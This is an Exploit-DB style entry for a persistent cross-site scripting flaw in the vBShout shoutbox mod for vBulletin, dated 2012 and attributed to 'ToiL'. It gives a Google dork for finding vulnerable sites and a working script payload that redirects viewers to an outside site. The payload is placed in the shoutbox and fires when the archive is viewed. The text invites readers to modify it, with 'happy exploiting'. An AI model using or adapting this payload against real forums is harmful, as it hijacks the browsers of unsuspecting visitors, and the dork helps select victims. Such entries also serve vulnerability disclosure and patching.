vBShout - Persistent Cross-Site Scripting

EDB-ID:

18644


Author:

ToiL

Type:

webapps


Platform:

PHP

Date:

2012-03-22


# Exploit Title: vBShout persistent XSS 0day

# Google Dork: "DragonByte Technologies Ltd" vbshout

# Date: 21/3/2012 9:00 PM #EST

# Author: ToiL

# Software Link: http://www.dragonbyte-tech.com/

# Version: all

# Tested on: all

# CVE : XSS

#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by www.Bugabuse.net/
#Have fun, And happy exploiting.

######Guide########


Enter
<script>top.location='https://www.bugabuse.net/';</script>
into the shoutbox
go into the archive.
Vioala. Persistent XSS exploit.
Modify to your liking.